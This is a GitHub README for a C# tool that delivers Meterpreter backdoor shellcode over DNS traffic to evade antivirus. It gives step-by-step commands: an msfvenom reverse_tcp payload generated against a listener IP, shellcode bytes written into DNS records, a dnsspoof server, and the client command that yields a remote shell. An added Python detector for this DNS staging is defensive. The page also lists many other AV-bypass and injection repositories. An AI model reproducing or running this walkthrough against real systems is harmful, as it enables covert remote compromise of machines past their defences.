Repository Details

C# code for Transferring Backdoor Payloads by DNS Traffic and Bypassing Anti-viruses

NativePayload_DNS

C# code for transferring backdoor payloads by DNS traffic and bypassing anti-viruses

Published by Damon Mohammadbagher

Warning: this code is published to explain an anti-virus vulnerability to pentesters and security researchers.

For more information and a step-by-step walkthrough, please visit these links:

Bypassing Anti-viruses with transfer Backdoor Payloads by DNS traffic https://www.linkedin.com/pulse/bypassing-anti-viruses-transfer-backdoor-payloads-dns-mohammadbagher

Bypassing Anti-viruses with transfer Backdoor Payloads by DNS traffic https://www.peerlyst.com/posts/bypassing-anti-viruses-with-transfer-backdoor-payloads-by-dns-traffic-damon-mohammadbagher

Video Published by Damon Mohammadbagher (bbxc9x00x1f)

Bypassing Anti-Viruses with transfer Backdoor Payloads by DNS traffic

Video 1 : https://youtu.be/M4dbqRWRsUk

Bypassing AVs with NativePayload_DNS and Meterpreter_Payload_Detection

Video 2 : https://youtu.be/ngZl4PSfW6o

Video Description: Bypassing AVs with NativePayload_DNS.exe and Detecting Meterpreter Process by Meterpreter_Payload_Detection tool

Step 1: Generate a C-type msfvenom payload on your Kali Linux machine

msfvenom --platform windows --arch x86_64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.50 -f c > /root/Desktop/payload.txt

Copy the payload bytes from payload.txt into dns.txt in this format:

root@kali:~# cat /root/Desktop/dns.txt

1.1.1.0 "0xfc0x480x830xe40xf00xe80xcc0x000x000x000x410x510x410x500x52.1.com"

1.1.1.1 "0x510x560x480x310xd20x650x480x8b0x520x600x480x8b0x520x180x48.1.com"

1.1.1.2 "0x8b0x520x200x480x8b0x720x500x480x0f0xb70x4a0x4a0x4d0x310xc9.1.com"

1.1.1.3 "0x480x310xc00xac0x3c0x610x7c0x020x2c0x200x410xc10xc90x0d0x41.1.com"

Step 2: Run a fake DNS server on your Kali Linux machine

root@kali:~# dnsspoof -i eth0 -f /root/Desktop/dns.txt

Step 3: Run the code on the client

Syntax: NativePayload_DNS.exe "1.1.1." 34 "192.168.1.50"

Finally, you can bypass AVs and you have a Meterpreter session.
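
From the defender's side, the transfer in steps 1 to 3 leaves a recognizable trace in DNS logs: answers whose first label is a run of 0xNN tokens, returned for consecutive addresses in one range. The following detection check is an added example, not code from this repository; it assumes the client resolves the 1.1.1.x addresses by reverse (PTR) lookup, and the log tuple layout, the threshold and the sample records are constructed for illustration.

```python
import re
from collections import defaultdict

# First label made only of "0xNN" tokens, as in the dns.txt format above
# (15 tokens = 60 characters, inside the 63-octet DNS label limit).
HEX_LABEL = re.compile(r"^(?:0x[0-9a-fA-F]{2}){4,}$")
MIN_HITS = 3  # assumed threshold: distinct flagged addresses per client


def is_hex_token_name(name):
    """True when the leftmost label of a PTR target is a run of 0xNN tokens."""
    return bool(HEX_LABEL.match(name.rstrip(".").split(".", 1)[0]))


def ptr_query_ip(qname):
    """Map '3.1.1.1.in-addr.arpa' to '1.1.1.3'; None if not an IPv4 PTR name."""
    q = qname.rstrip(".").lower()
    if not q.endswith(".in-addr.arpa"):
        return None
    octets = q[: -len(".in-addr.arpa")].split(".")
    if len(octets) != 4 or not all(o.isdigit() for o in octets):
        return None
    return ".".join(reversed(octets))


def find_staging_clients(records, min_hits=MIN_HITS):
    """Return {(client, resolver, /24 prefix): [addresses]} over the threshold."""
    hits = defaultdict(set)
    for client, resolver, qtype, qname, answer in records:
        ip = ptr_query_ip(qname) if qtype == "PTR" else None
        if ip and is_hex_token_name(answer):
            hits[(client, resolver, ip.rsplit(".", 1)[0])].add(ip)
    return {key: sorted(ips, key=lambda a: int(a.rsplit(".", 1)[1]))
            for key, ips in hits.items() if len(ips) >= min_hits}


# Constructed sample records (client, resolver, qtype, qname, answer); not real traffic.
SAMPLE = [
    ("10.0.0.7", "192.168.1.50", "PTR", "0.1.1.1.in-addr.arpa", "0x000x010x020x030x04.1.com"),
    ("10.0.0.7", "192.168.1.50", "PTR", "1.1.1.1.in-addr.arpa", "0x050x060x070x080x09.1.com"),
    ("10.0.0.7", "192.168.1.50", "PTR", "2.1.1.1.in-addr.arpa", "0x0a0x0b0x0c0x0d0x0e.1.com"),
    ("10.0.0.7", "192.168.1.50", "PTR", "3.1.1.1.in-addr.arpa", "0x0f0x100x110x120x13.1.com"),
    ("10.0.0.9", "10.0.0.1", "PTR", "8.8.8.8.in-addr.arpa", "dns.google."),
    ("10.0.0.9", "10.0.0.1", "PTR", "5.2.0.192.in-addr.arpa", "0xdeadbeef.example.com"),
    ("10.0.0.9", "10.0.0.1", "A", "www.example.com", "192.0.2.10"),
]

if __name__ == "__main__":
    for key, ips in find_staging_clients(SAMPLE).items():
        print(key, ips)
```

Grouping by resolver also surfaces clients that send these lookups to a host other than the organization's own DNS servers.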

Related Tool:

C# code for Backdoor Payloads transfer by IPv6 Address (AAAA) records and DNS Traffic also Bypassing Anti-viruses https://github.com/DamonMohammadbagher/NativePayload_IP6DNS

Related link:

Bypass all anti-viruses by Encrypted Payloads with C#

https://www.linkedin.com/pulse/bypass-all-anti-viruses-encrypted-payloads-c-damon-mohammadbagher?trk=pulse_spock-articles

More Repositories

1. eBook-BypassingAVsByCSharp (458 stars): eBook "Bypassing AVS by C#.NET Programming" (Free Chapters only)
2. ETWProcessMon2 (C#, 291 stars): ETWProcessMon2 is for Monitoring Process/Thread/Memory/Imageloads/TCPIP via ETW + Detection for Remote-Thread-Injection & Payload Detection by VirtualMemAlloc Events (in-memory) etc.
3. NativePayloads (C#, 222 stars): All my Source Codes (Repos) for Red-Teaming & Pentesting + Blue Teaming
4. NativePayload_Reverse_tcp (C#, 160 stars): Meterpreter Encrypted Payload by C#
5. Meterpreter_Payload_Detection (C#, 159 stars): Meterpreter_Payload_Detection.exe tool for detecting Meterpreter in memory like IPS-IDS and Forensics tool
6. NativePayload_CBT (C#, 114 stars): NativePayload_CallBackTechniques C# Codes (Code Execution via Callback Functions Technique, without CreateThread Native API)
7. NativePayload_ReverseShell (C#, 109 stars): This is Simple C# Source code to Bypass almost "all" AVS, (kaspersky v19, Eset v12 v13 ,Trend-Micro v16, Comodo & Windows Defender Bypassed via this method Very Simple)
8. Some_Pentesters_SecurityResearchers_RedTeamers (103 stars): Some Pentesters, Security Researchers, Red Teamers which i learned from them a lot...
9. NativePayload_Image (Shell, 79 stars): Transferring Backdoor Payloads with BMP Image Pixels
10. NativePayload_PE1 (C#, 57 stars): NativePayload_PE1/PE2 , Injecting Meterpreter Payload bytes into local Process via Delegation Technique + in-memory with delay Changing RWX to X or RX or (both) [Bypassing AVs]
11. NativePayload_BSSID (Shell, 55 stars): Transferring Backdoor Payload by BSSID and Wireless traffic
12. NativePayload_DNS2 (C#, 45 stars): C# code for Transferring Backdoor Payloads by DNS Traffic (A - PTR Records) and Bypassing Anti-viruses
13. NativePayload_ARP (C#, 43 stars): C# code for Transferring Backdoor Payloads by ARP Traffic and Bypassing Anti-viruses (Slow)
14. Videos-BypassingAVsByCSharp (41 stars): Video files for eBook: "Bypassing AVs by C#.NET Programming"
15. ETWNetMonv3 (C#, 38 stars): ETWNetMonv3 is simple C# code for Monitoring TCP Network Connection via ETW & ETWProcessMon/2 is for Monitoring Process/Thread/Memory/Imageloads/TCPIP via ETW + Detection for Remote-Thread-Injection & Payload Detection by VirtualMemAlloc Events (in-memory) etc.
16. NativePayload_IP6DNS (C#, 31 stars): C# code for Transferring Backdoor Payloads by IPv6 Address (AAAA) records and DNS Traffic also Bypassing Anti-viruses
17. NativePayload_ICMP (C#, 29 stars): C# code for Transferring Backdoor Payloads by ICMPv4 Traffic and bypassing Anti-Viruses
18. FakeFileMaker (C#, 24 stars): Social Engineering: Simple way to make a fake file for Backdoors
19. BEV4 (C#, 16 stars): BasicEventViewer4 (BEV v4.0), this code will useful for All Blue/Purple Teams , RealTime Monitoring Sysmon Events , Mitre Attack Detections via yaml files
20. NativePayload_HTTP (Shell, 16 stars): Data Exfiltration via HTTP Traffic (C# and Shell Script)
21. NativePayload_ARP2 (Shell, 13 stars): Simple Script "NativePayload_ARP2.sh" for Sending DATA via ARP Bcast Traffic to all systems in (LAN) by "Vid" tag
22. NativePayload_Tinjection (C#, 12 stars): Remote Thread Injection by C# + Delegate Techniques
23. NativePayload_TiACBT (C#, 12 stars): NativePayload_TiACBT (Remote Thread Injection + C# Async Method + CallBack Functions Technique)
24. NativePayload_DIM (C#, 11 stars): NativePayload_DIM Dynamic native dll Injection in Memory , Injecting Native DLL bytes to local Process
25. NativePayload_DCP (C#, 11 stars): Compiling Csharp in-memory and Execute to bypass AVs
26. Exfiltration-and-Uploading-DATA-by-DNS-Traffic-AAAA-Records- (10 stars): Pdf File : Exfiltration and Uploading DATA by DNS Traffic (AAAA Records)
27. RedbudTree (C#, 9 stars): DNS IPv6 Request Listener (UDP Port 53) for Detecting Exfiltration DATA via IPv6 DNS AAAA Record Requests
28. eBook_Bypassing-Antiviruses-by-C-Programming-v2.0 (9 stars): bypassing Anti-viruses by csharp programming v2.0
29. NativePayload_LocalCreateThread7 (C#, 9 stars): Chunking CobaltStrike Payloads + Jump Method
30. FSWatch (C#, 8 stars): File System Watcher via C# (Monitoring File Activity , Create/Delete/Change/Rename events + some Activity like Size/Attribute/Security Changes & LastAccess, LastWrite etc...)
31. damonmohammadbagher.github.io (HTML, 8 stars)
32. NativePayload_CTX (C#, 8 stars): NativePayload_CTX Create Thread via _beginthreadex function in msvcrt.dll
33. TCPMon (C#, 7 stars): TCPMon v3.1 or (4.0) was a very old Code which made by me in C# for Monitoring TCP Connection via Native APIs (was fun in that time ;D)
34. Payload-hiding-Method-via-Infecting-Target-Process-Memory (HTML, 7 stars)
35. NativePayload_TId (C#, 7 stars): Remote Thread Injection by C# Delegate
36. NativePayload_CDynApp3 (C#, 7 stars): Loading Csharp C2 Client-side codes in RAM by Very Simple New Technique to avoid Detection
37. NativePayload_RefPtr1 (C#, 5 stars): NativePayload_RefPtr1 Indirect call csharp method in memory [without call c# method in source code directly]
38. NativePayload_ASM3 (C#, 5 stars): NativePayload_ASM/AsynASM , Injecting Meterpreter Payload bytes into local Process via Delegation Technique [Technique D] + in-memory with delay Changing RWX to X [Bypassing AVs]
39. NativePayload_MP (C#, 4 stars): C# Backdoor & Mapper/Proxy tool (backdoor & proxy tool working in memory only)
40. Manifest-Creator (C#, 4 stars): C# tool for make XML report from Network Hosts (report contains: Cpu,Bios,Motherboard,Vga,Sound,Hdd,Ram,Display-Monitor,IpAddress,Os,Users,...)
41. NativePayload_DynLCI (C#, 4 stars): NativePayload_DynLCI , Dynamic Local Code Invoke , Injecting Meterpreter Payload bytes into local Process
42. NativePayload_JMP4 (C#, 4 stars): in C# you can use Emit(Opcodes.jmp,TargetMethod) in your codes without writing any asm bytes in code to jump to pointer of TargetMethod or (MethodInfo) to run in-memory via Emit(Opcodes.jmp, method) in system.reflection namespace
43. BEV3 (C#, 2 stars): BasicEventViewer (BEV v3.0), this code will useful for All Blue Teamers.
44. DamonMohammadbagher (2 stars)
45. NativePayload_DYN (C#, 2 stars): Compiling Csharp in-memory and Execute to bypass AVs